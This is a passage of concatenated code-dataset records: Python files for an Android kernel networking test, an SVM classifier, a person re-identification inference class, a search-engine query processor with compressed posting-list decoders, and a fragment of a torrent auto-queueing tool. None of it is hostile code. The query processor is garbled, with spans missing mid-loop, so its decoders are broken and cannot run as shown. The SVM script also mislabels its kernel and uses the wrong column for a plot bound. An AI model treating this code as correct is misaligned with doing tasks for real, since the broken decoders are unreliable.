path_utils.JoinTargetPath('data', *bin_path)\n\n def tearDownClass(self):\n self.shell('rm -rf %s' % path_utils.TargetDirName(self.target_bin_path))\n\n def testKernelNetworking(self):\n \"\"\"Android kernel unit test.\"\"\"\n # Push the test binary to target device.\n self.shell('mkdir -p %s' % path_utils.TargetDirName(self.target_bin_path))\n self.dut.adb.push('%s %s' % (self.host_bin_path, self.target_bin_path))\n self.shell('chmod 777 %s' % self.target_bin_path)\n\n # Execute the test binary.\n result = self.shell(self.target_bin_path, no_except=True)\n\n logging.info('stdout: %s', result[const.STDOUT])\n logging.error('stderr: %s', result[const.STDERR])\n logging.info('exit code: %s', result[const.EXIT_CODE])\n asserts.assertFalse(\n result[const.EXIT_CODE],\n 'kernel_net_tests binary returned non-zero exit code.')\n\nif __name__ == '__main__':\n test_runner.main()\n", "sub_path": "test/vts-testcase/kernel/api/net/VtsKernelNetTest.py", "file_name": "VtsKernelNetTest.py", "file_ext": "py", "file_size_in_byte": 2918, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "vts.runners.host.base_test.BaseTestClass", "line_number": 29, "usage_type": "attribute"}, {"api_name": "vts.runners.host.base_test", "line_number": 29, "usage_type": "name"}, {"api_name": "vts.runners.host.keys.ConfigKeys", "line_number": 41, "usage_type": "attribute"}, {"api_name": "vts.runners.host.keys", "line_number": 41, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 44, "usage_type": "call"}, {"api_name": 
"vts.runners.host.keys.ConfigKeys", "line_number": 44, "usage_type": "attribute"}, {"api_name": "vts.runners.host.keys", "line_number": 44, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "vts.utils.python.os.path_utils.JoinTargetPath", "line_number": 56, "usage_type": "call"}, {"api_name": "vts.utils.python.os.path_utils", "line_number": 56, "usage_type": "name"}, {"api_name": "vts.utils.python.os.path_utils.TargetDirName", "line_number": 59, "usage_type": "call"}, {"api_name": "vts.utils.python.os.path_utils", "line_number": 59, "usage_type": "name"}, {"api_name": "vts.utils.python.os.path_utils.TargetDirName", "line_number": 64, "usage_type": "call"}, {"api_name": "vts.utils.python.os.path_utils", "line_number": 64, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 71, "usage_type": "call"}, {"api_name": "vts.runners.host.const.STDOUT", "line_number": 71, "usage_type": "attribute"}, {"api_name": "vts.runners.host.const", "line_number": 71, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 72, "usage_type": "call"}, {"api_name": "vts.runners.host.const.STDERR", "line_number": 72, "usage_type": "attribute"}, {"api_name": "vts.runners.host.const", "line_number": 72, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 73, "usage_type": "call"}, {"api_name": "vts.runners.host.const.EXIT_CODE", "line_number": 73, "usage_type": "attribute"}, {"api_name": "vts.runners.host.const", "line_number": 73, "usage_type": "name"}, {"api_name": "vts.runners.host.asserts.assertFalse", "line_number": 74, "usage_type": "call"}, {"api_name": "vts.runners.host.asserts", "line_number": 74, "usage_type": "name"}, {"api_name": "vts.runners.host.const.EXIT_CODE", "line_number": 75, "usage_type": "attribute"}, {"api_name": "vts.runners.host.const", "line_number": 75, "usage_type": "name"}, {"api_name": "vts.runners.host.test_runner.main", "line_number": 79, "usage_type": "call"}, {"api_name": "vts.runners.host.test_runner", "line_number": 79, "usage_type": "name"}]} +{"seq_id": "324383740", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 2 13:40:11 2017\n\n@author: heisenberg\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef load_dataset():\n global dataset, X, Y\n dataset = pd.read_csv(\"Social_Network_Ads.csv\")\n X = dataset.iloc[:,2:4].values\n Y = dataset.iloc[:,-1].values\n \ndef scale_data():\n global X\n from sklearn.preprocessing import StandardScaler\n sc_x = StandardScaler()\n sc_x.fit(X)\n X=sc_x.transform(X)\n \ndef split_train_test():\n global x_train, x_test, y_test, y_train\n from sklearn.model_selection import train_test_split\n x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.2)\n \ndef create_train_model():\n global classifier\n from sklearn.svm import SVC\n classifier = SVC(kernel = 'linear')\n classifier.fit(x_train,y_train)\n \ndef predict_values():\n global y_pred\n y_pred = classifier.predict(x_test)\n \ndef analyse_confusion_matrix():\n from sklearn.metrics import confusion_matrix\n cm = confusion_matrix(y_test, y_pred)\n print(cm)\n \ndef plot_graph():\n from matplotlib.colors import ListedColormap\n global X1, X2\n x_set, y_set = x_train, y_train\n X1, X2 = np.meshgrid(np.arange(start = min(x_set[:,0])-1, stop = max(x_set[:,1])+1, step = 0.01),\n np.arange(start = min(x_set[:,1])-1, stop = max(x_set[:,1])+1, step 
= 0.01))\n plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(),X2.ravel()]).T).reshape(X1.shape),\n alpha = 0.75, cmap = ListedColormap(('red','green')))\n plt.xlim(X1.min(), X1.max())\n plt.ylim(X2.min(), X2.max())\n for i,j in enumerate(np.unique(y_set)):\n plt.scatter(x_set[y_set==j,0], x_set[y_set==j,1], \n c=ListedColormap(('red','green'))(i), label=j)\n plt.title(\"SVM Classification with RBF kernel\")\n plt.xlabel(\"Age\")\n plt.ylabel(\"Salary\")\n plt.legend()\n \nload_dataset()\nscale_data()\nsplit_train_test()\ncreate_train_model()\npredict_values()\nanalyse_confusion_matrix()\nplot_graph()", "sub_path": "SVM classifier/support_vector_classifier.py", "file_name": "support_vector_classifier.py", "file_ext": "py", "file_size_in_byte": 2085, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 62, "usage_type": "name"}]} +{"seq_id": "273947999", "text": "import torch\nimport os\nimport numpy as np\nimport cv2\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom .config import Config\nfrom .utils.to_sqlite import insert_vector_db, insert_human_db, insert_infer_db, load_gallery_from_db, convertToBinaryData, load_human_db, convertImgtoBlob, convertBlobtoIMG\nfrom .utils.reranking import re_ranking\n\nfrom .model import make_model\nfrom 
torch.backends import cudnn\nimport torchvision.transforms as T\nfrom .utils.metrics import cosine_similarity, euclidean_distance\nimport pickle\n\n\nclass reid_inference:\n \"\"\"Reid Inference class.\n \"\"\"\n\n def __init__(self):\n cudnn.benchmark = True\n self.Cfg = Config()\n self.model = make_model(self.Cfg, 255)\n self.model.load_param(self.Cfg.TEST_WEIGHT)\n self.model = self.model.to('cuda')\n self.transform = T.Compose([\n T.Resize(self.Cfg.INPUT_SIZE),\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n print(f'Model loaded with weight from {self.Cfg.TEST_WEIGHT}')\n self.model.eval()\n print('Ready to Eval')\n print('Loading from DB...')\n self.all_img_id, self.all_patch_img, self.all_gal_feat = load_gallery_from_db() #load from vectorkb_table\n self.human_dict = load_human_db()\n self._tmp_img = \"\"\n self._tmp_galfeat = \"\"\n print('Data loaded. You can start infer an image using to_gallery_feat --> query_feat --> infer')\n \n\n\n def to_gallery_feat(self, image_patch_or_path, flip=True, norm=True):\n \"\"\"\n Use to build gallery feat on images picked from Deep Sort.\n This is different from normal query feature extraction as this has flipped & normed feature,\n to improve the matching precision.\n Takes image path or PIL image directly.\n To be combined with INFER function at the end of troubleshooting\n \"\"\"\n if type(image_patch_or_path) is str:\n query_img = Image.open(image_patch_or_path)\n else:\n query_img = image_patch_or_path\n \n input = torch.unsqueeze(self.transform(query_img), 0)\n input = input.to('cuda')\n with torch.no_grad():\n if flip:\n gal_feat = torch.FloatTensor(input.size(0), 2048).zero_().cuda()\n for i in range(2):\n if i == 1:\n inv_idx = torch.arange(input.size(3) - 1, -1, -1).long().cuda()\n input = input.index_select(3, inv_idx)\n f = self.model(input)\n gal_feat = gal_feat + f\n else:\n gal_feat = self.model(input)\n\n if norm:\n gal_feat = torch.nn.functional.normalize(gal_feat, dim=1, p=2)\n\n self._tmp_img = query_img #temp save PIL image here\n self._tmp_galfeat = gal_feat #temp save gal_feat here\n return gal_feat\n\n\n\n\n def to_query_feat(self, image_patch_or_path):\n \"\"\"\n image - input image path.\n for finding query feature, no flipping and normalization is done.\n This function returns feature (1,2048) tensor.\n\n \"\"\"\n if type(image_patch_or_path) is str:\n query_img = Image.open(image_patch_or_path)\n else:\n query_img = image_patch_or_path\n\n input = torch.unsqueeze(self.transform(query_img), 0)\n input = input.to('cuda')\n with torch.no_grad():\n query_feat = self.model(input)\n return query_feat\n\n\n\n def infer(self, query_feat, query_img_id, top_k= 3, reranking=True):\n if len(self.all_gal_feat)>0:\n # if reranking:\n # dist_mat = 1 - re_ranking(query_feat, self.all_gal_feat, k1=30, k2=10, lambda_value=0.2)[0]\n # indices = np.argsort(dist_mat)[::-1]\n\n # else:\n dist_mat = torch.nn.functional.cosine_similarity(query_feat, self.all_gal_feat).cpu().numpy()\n indices = np.argsort(dist_mat)[::-1][:50] #to test if use 50 or use all better\n\n #do reranking\n if reranking:\n candidate_gal_feat = torch.index_select(self.all_gal_feat, 0, torch.tensor([indices]).cuda()[0])\n rerank_dist = re_ranking(query_feat, candidate_gal_feat, k1=30, k2=6, lambda_value=0.3)[0]\n rerank_idx = np.argsort(1-rerank_dist)[::-1]\n indices = np.array([indices[i] for i in rerank_idx])\n \n #if match found --> insert to human_table, need a human list too. 
make it into class\n #if no match found --> insert new identity to human_table.\n if dist_mat[indices[0]] >= self.Cfg.THRESHOLD:\n\n \n #match found\n matched_img_id = self.all_img_id[indices[0]]\n identity = self.human_dict[matched_img_id]\n print(f\"Match found! Identity is {identity}\")\n\n #insert to human_table & dict\n insert_human_db(query_img_id, identity, \"Matched\")\n self.human_dict[query_img_id] = identity\n\n #insert query image to gallery table & list. Recalling we have self.tmp variables\n query_img_blob = convertImgtoBlob(self._tmp_img)\n insert_vector_db(query_img_id, query_img_blob, pickle.dumps(self._tmp_galfeat) ) \n\n #insert to record table\n record = [query_img_id , query_img_blob]\n for k in range(top_k):\n try:\n record.append(self.all_img_id[indices[k]])\n record.append(convertImgtoBlob(self.all_patch_img[indices[k]]))\n record.append(dist_mat.item(indices[k]))\n except:\n record.append(None)\n record.append(None)\n record.append(None)\n insert_infer_db(record)\n\n\n elif (len(indices)>= 2) and (dist_mat[indices[1]] >= 0.75):\n #match found\n matched_img_id = self.all_img_id[indices[1]]\n identity = self.human_dict[matched_img_id]\n print(f\"Match found! Identity is {identity} --> SECOND MATCH\")\n\n #insert to human_table & dict\n insert_human_db(query_img_id, identity, \"Matched\")\n self.human_dict[query_img_id] = identity\n\n #insert query image to gallery table & list. Recalling we have self.tmp variables\n query_img_blob = convertImgtoBlob(self._tmp_img)\n insert_vector_db(query_img_id, query_img_blob, pickle.dumps(self._tmp_galfeat) ) \n\n #insert to record table\n record = [query_img_id , query_img_blob]\n for k in range(top_k):\n try:\n record.append(self.all_img_id[indices[k+1]])\n record.append(convertImgtoBlob(self.all_patch_img[indices[k+1]]))\n record.append(dist_mat.item(indices[k+1]))\n except:\n record.append(None)\n record.append(None)\n record.append(None)\n insert_infer_db(record)\n\n else:\n #no match found\n new_identity = str(max(map(int, self.human_dict.values()))+1)\n print(f\"No match found! Creating new identity -- {new_identity}\")\n\n #insert to human_table & dict\n insert_human_db(query_img_id, new_identity, \"New\")\n self.human_dict[query_img_id] = new_identity\n\n #insert query image to gallery table & list. Recalling we have self.tmp variables\n query_img_blob = convertImgtoBlob(self._tmp_img)\n insert_vector_db(query_img_id, query_img_blob, pickle.dumps(self._tmp_galfeat) ) \n\n #insert to record table\n record = [query_img_id , query_img_blob]\n for k in range(top_k):\n record.append(None)\n try:\n record.append(convertImgtoBlob(self.all_patch_img[indices[k]]))\n record.append(dist_mat.item(indices[k]))\n except:\n record.append(None)\n record.append(None)\n insert_infer_db(record)\n\n #Putting these records into memory database\n self.all_img_id.append(query_img_id)\n self.all_patch_img.append(self._tmp_img)\n self.all_gal_feat = torch.cat([self.all_gal_feat, self._tmp_galfeat])\n\n \n else:\n #new record\n new_identity = str(1)\n print(f\"No match found! Creating new identity -- {new_identity}\")\n\n #insert to human_table & dict\n insert_human_db(query_img_id, new_identity, \"New\")\n self.human_dict[query_img_id] = new_identity\n\n #insert query image to gallery table & list. 
Recalling we have self.tmp variables\n query_img_blob = convertImgtoBlob(self._tmp_img)\n insert_vector_db(query_img_id, query_img_blob, pickle.dumps(self._tmp_galfeat) ) \n\n #insert to record table\n record = [query_img_id , query_img_blob]\n for k in range(top_k):\n record.append(None)\n record.append(None)\n record.append(None)\n insert_infer_db(record)\n\n #Putting these records into memory database\n self.all_img_id.append(query_img_id)\n self.all_patch_img.append(self._tmp_img)\n self.all_gal_feat = torch.cat([self.all_gal_feat, self._tmp_galfeat])\n\n\n\n\n\n\n\n \n # def build_all_gallery(dir_to_gal_folder = self.Cfg.GALLERY_DIR, to_db = False):\n # \"\"\"\n # TAKE NOTEE!! TO BE MODIFIED AS WE NO LONGER NEED TO MASS UPLOAD FROM\n # IMG FILE TO GALLERY DB.\n # \"\"\"\n # all_gal_feat = []\n # all_img_id = os.listdir(dir_to_gal_folder) #this is id rather than path\n\n # db_feat = []\n # db_img = []\n\n # print(f'Building gallery from {dir_to_gal_folder}...')\n # for img in all_img_id:\n # gal_feat = to_gallery_feat(dir_to_gal_folder + \"/\" + img)\n # all_gal_feat.append(gal_feat)\n # db_feat.append(pickle.dumps(gal_feat))\n # db_img.append(convertToBinaryData(dir_to_gal_folder + \"/\" + img))\n\n # all_gal_feat = torch.cat(all_gal_feat, dim=0)\n\n # if to_db:\n # db_img_path = [dir_to_gal_folder + \"/\" + img for img in all_img_id]\n # db_humam_id = [img.split('_')[0] for img in all_img_id]\n # insert_vector_db(all_img_id, db_img_path, db_img, db_feat)\n # insert_human_db(all_img_id, db_humam_id)\n # print('All gallery uploaded to DB.')\n # else:\n # return all_gal_feat, all_img_id\n\n # UNSUPPORTED\n # plt.subplot(1, top_k+2, 1)\n # plt.title('Query')\n # plt.axis('off')\n # query_img = Image.open(query_img_path)\n # plt.imshow(np.asarray(query_img))\n\n # for k in range(top_k):\n # plt.subplot(1, top_k+2, k+3)\n # name = str(indices[k]) + '\\n' + '{0:.2f}'.format(dist_mat[indices[k]])\n # img = np.asarray(Image.open(self.all_img_path[indices[k]]))\n # plt.title(name)\n # plt.axis('off')\n # plt.imshow(img)\n # plt.show()", "sub_path": "human_tracker/reid/inference.py", "file_name": "inference.py", "file_ext": "py", "file_size_in_byte": 11717, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.backends.cudnn.benchmark", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 23, "usage_type": "name"}, {"api_name": "config.Config", "line_number": 24, "usage_type": "call"}, {"api_name": "model.make_model", "line_number": 25, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 28, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 28, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 29, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 29, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 30, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 30, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 31, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 31, "usage_type": "name"}, {"api_name": "utils.to_sqlite.load_gallery_from_db", "line_number": 37, "usage_type": "call"}, {"api_name": "utils.to_sqlite.load_human_db", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 54, "usage_type": 
"call"}, {"api_name": "PIL.Image", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.unsqueeze", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 90, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.unsqueeze", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.nn.functional.cosine_similarity", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 114, "usage_type": "call"}, {"api_name": "utils.reranking.re_ranking", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_human_db", "line_number": 130, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 134, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_vector_db", "line_number": 135, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 135, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 142, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_infer_db", "line_number": 148, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_human_db", "line_number": 158, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 162, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_vector_db", "line_number": 163, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 163, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 170, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_infer_db", "line_number": 176, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_human_db", "line_number": 184, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 188, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_vector_db", "line_number": 189, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 196, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_infer_db", "line_number": 201, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 206, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_human_db", "line_number": 215, "usage_type": "call"}, {"api_name": "utils.to_sqlite.convertImgtoBlob", "line_number": 219, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_vector_db", "line_number": 220, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 220, "usage_type": "call"}, {"api_name": "utils.to_sqlite.insert_infer_db", "line_number": 228, "usage_type": "call"}, {"api_name": 
"torch.cat", "line_number": 233, "usage_type": "call"}]} +{"seq_id": "326427768", "text": "from bs4 import BeautifulSoup\nfrom PorterStemmer import PorterStemmer\nfrom collections import defaultdict\nimport snappy\nimport sys\nimport json\nimport re\nimport os\nimport string\nimport time\n\ndef c5_decode(x):\n pl=[]\n i = 0\n b = 0\n k = 0\n while(True):\n byte = x[i:i+8]\n readByte = int(byte, 2)\n i+=8\n if(readByte<128):\n b = b*128 + readByte\n break\n else:\n b = b*128 + (readByte-128)\n while(True):\n byte = x[i:i+8]\n readByte = int(byte, 2)\n i+=8\n if(readByte<128):\n k = k*128 + readByte\n break\n else:\n k = k*128 + (readByte-128)\n if(k==2):\n return pl\n while(i+k<=len(x)):\n block = x[i:i+k]\n i+=k\n block_val = int(block, 2)\n if(block_val == (2**k - 1)):\n break\n else: \n pl.append(b+block_val)\n excess_element = 0\n while(i+8<=len(x)):\n byte = x[i:i+8]\n readByte = int(byte, 2)\n i+=8\n if(readByte<128):\n excess_element = excess_element*128 + readByte\n pl.append(excess_element)\n excess_element = 0\n else:\n excess_element = excess_element*128 + (readByte-128)\n return pl\n\ndef create_lists_to_intersect(c_no, query, indexfile):\n lists_to_intersect = []\n for term in query:\n term_list = []\n if term not in offsetAndLength:\n term_list=[]\n lists_to_intersect.append(term_list)\n elif(c_no==0):\n offset = offsetAndLength[term][0]\n with open(indexfile, \"rb\") as f:\n f.seek(offset)\n encoded = f.read(offsetAndLength[term][1])\n encoded = encoded.decode('utf8')\n term_list = encoded.split(',')\n term_list = [int(ele) for ele in term_list]\n lists_to_intersect.append(term_list)\n elif(c_no==1):\n offset = offsetAndLength[term][0]\n with open(indexfile, \"rb\") as f:\n decoded = 0\n totalDecoded = 0\n f.seek(offset)\n while(totalDecoded=offsetAndLength[term][1]*8):\n break\n if(j>=offsetAndLength[term][1]*8 and uncomp[-1]=='1'):\n break\n j+=1\n c_len+=1\n llx=c_len\n lx=1\n for _ in range(0,llx-1):\n bit = int(uncomp[j])\n lx = lx*2 + bit\n j = j+1\n x = 1\n for _ in range(lx-1):\n bit = int(uncomp[j])\n x = x*2 + bit\n j = j+1\n term_list.append(x) \n lists_to_intersect.append(term_list)\n elif(c_no==3):\n offset = offsetAndLength[term][0]\n with open(indexfile, \"rb\") as f:\n f.seek(offset)\n comp = f.read(offsetAndLength[term][1])\n uncomp = snappy.uncompress(comp)\n strList1 = uncomp.decode()\n strList1 = strList1.split(',')\n term_list = [int(ele) for ele in strList1]\n lists_to_intersect.append(term_list)\n elif(c_no==4 or c_no>5 or c_no<0):\n print('not implemented')\n exit()\n elif(c_no==5):\n offset = offsetAndLength[term][0]\n with open(indexfile, \"rb\") as f:\n f.seek(offset)\n comp = list(f.read(offsetAndLength[term][1]))\n comp = ''.join(['{0:08b}'.format(x) for x in comp])\n uncomp = c5_decode(comp)\n lists_to_intersect.append(uncomp)\n return sorted(lists_to_intersect, key=len)\n\n\n\nif __name__ == '__main__':\n start = time.time()\n queryfile = sys.argv[1]\n resultfile = sys.argv[2]\n indexfile = sys.argv[3]\n dictfile = sys.argv[4]\n c_no = -1\n\n exclist = ',.:;\"(){}[]\\n`\\''\n table = str.maketrans(exclist, ' '*len(exclist), '')\n\n f = open(dictfile, 'r')\n offsetAndLength = json.load(f)\n docId = {}\n docId = offsetAndLength['DocIdMapLength']\n f.close()\n\n stopwords = set()\n with open(indexfile, \"rb\") as f:\n c_no = f.read(1)\n c_no = int.from_bytes(c_no, sys.byteorder)\n\n\n if(c_no==-1):\n print('not_implemented')\n exit()\n \n ps = PorterStemmer()\n\n queries = []\n with open(queryfile, 'r') as f:\n for line in f:\n temp = 
line.rstrip()\n tempList = temp = temp.translate(str.maketrans(table)).split()\n if(len(tempList)>0):\n queries.append(tempList)\n for query in queries:\n for i in range(0, len(query)):\n query[i] = ps.stem(query[i].lower(), 0, len(query[i])-1)\n qCounter = 0\n # print(queries)\n with open(resultfile,'w') as f:\n f.truncate(0)\n for query in queries:\n lists_to_intersect = create_lists_to_intersect(c_no, query, indexfile) \n f1 = open(resultfile, 'a') \n result = []\n if(len(lists_to_intersect)>0):\n result = lists_to_intersect[0]\n else: \n result = []\n continue \n for list_no in range(1, len(lists_to_intersect)): \n newResult=[] \n len1 = len(result)\n len2 = len(lists_to_intersect[list_no])\n i = 0\n j = 0\n t1 = 0\n t2 = 0\n lastEle = 0\n if(len1>0):\n t1=result[0]\n else:\n result=[]\n break\n if(len2>0):\n t2=lists_to_intersect[list_no][0]\n else: \n result=[]\n break\n while(i= int(min_) * 1024*1024)\n if max_.isnumeric():\n q = q.filter(Torrent.size <= int(max_) * 1024*1024)\n\n accepted[filter_name] = []\n for row in q.all():\n if regex and not re.search(regex, row.name, re.IGNORECASE):\n continue\n\n accepted[filter_name].append(row)\n\n return accepted\n\n @withconfig\n def run(self, db_shell=False, dry_run=False, settings=None):\n if db_shell:\n return self.run_db_session()\n\n self.sync_states(dry_run)\n\n accepted = self.filter(settings)\n if accepted and not dry_run:\n for t_obj in itertools.chain.from_iterable(accepted.values()):\n self.queue_torrent(t_obj)\n\n for (f, accepted) in accepted.items():\n if len(accepted) == 1:\n notify(msg=\"Accepted %s item: %s\" % (f, accepted[0].name))\n if len(accepted) > 1:\n notify(msg=\"Accepted %s items for %s\" % (len(accepted), f))\n", "sub_path": "zizi/apps/bypass/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 5633, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "zizi.core.pkgmng.argument", "line_number": 18, "usage_type": "call"}, {"api_name": "zizi.core.pkgmng.argument", "line_number": 23, "usage_type": "call"}, {"api_name": "zizi.core.db.create_session", "line_number": 30, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.dbpath", "line_number": 30, "usage_type": "name"}, {"api_name": "zizi.apps.bypass.backend.TransmissionBackend", "line_number": 31, "usage_type": "call"}, {"api_name": "zizi.extras.logging.get_logger", "line_number": 32, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pdb.set_trace", "line_number": 56, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 61, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 61, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 66, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 66, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 67, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 67, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 68, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 68, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 69, "usage_type": "attribute"}, 
{"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 69, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 70, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 70, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 73, "usage_type": "argument"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.state.in_", "line_number": 74, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.state", "line_number": 74, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 74, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 74, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 88, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 88, "usage_type": "name"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.State", "line_number": 108, "usage_type": "attribute"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 108, "usage_type": "name"}, {"api_name": "zizi.extras.notifications.notify", "line_number": 109, "usage_type": "call"}, {"api_name": "zizi.apps.torrentspider.store.Torrent", "line_number": 131, "usage_type": "argument"}, {"api_name": "zizi.apps.torrentspider.store.Torrent.state", "line_number": 131, 